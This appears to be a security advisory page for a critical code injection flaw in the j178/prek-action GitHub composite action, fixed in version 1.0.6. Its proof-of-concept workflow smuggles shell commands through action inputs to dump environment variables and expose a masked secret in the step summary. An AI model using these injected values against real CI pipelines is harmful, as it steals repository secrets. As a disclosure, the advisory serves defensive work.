j178/prek-action vulnerable to arbitrary code injection in composite action

Summary

There are three potential attacks of arbitrary code injection vulnerability in the composite action at action.yml.

Details

The GitHub Action variables inputs.prek-version, inputs.extra_args, and inputs.extra-args can be used to execute arbitrary code in the context of the action.

PoC

- uses: j178/prek-action@v1.0.5
  with:
    prek-version: $(printenv &gt;&gt; $GITHUB_STEP_SUMMARY &amp;&amp; echo &quot;0.2.2&quot;)
    extra_args: &#039;&amp;&amp; echo &quot;MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}&quot; &gt;&gt; $GITHUB_STEP_SUMMARY &amp;&amp; echo &quot;&quot;&#039;
  env:
    MY_SECRET: ${{ secrets.MY_SECRET }}

The previous example will print all the environment variables, and it will expose MY_SECRET environment variable value to the summary of the workflow. An attacker could potentially use this vector to compromise the security of the target repository, even passing unnotice because the action will run normally.

Impact

Critical, CWE-94

Published: Sep 29, 2025
Updated: Sep 30, 2025
GHSA: GHSA-pwf7-47c3-mfhx
Severity: Critical
Exploit:

CVSS v3:

Severity: Unknown
Score:
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWEs:

CWE-94

Affected Software
References

Software	From	Fixed in
j178 / prek-action	-	1.0.6

Vulnerability Database

j178/prek-action vulnerable to arbitrary code injection in composite action

Summary

Details

PoC

Impact

Deep Security Visibility Without the Complexity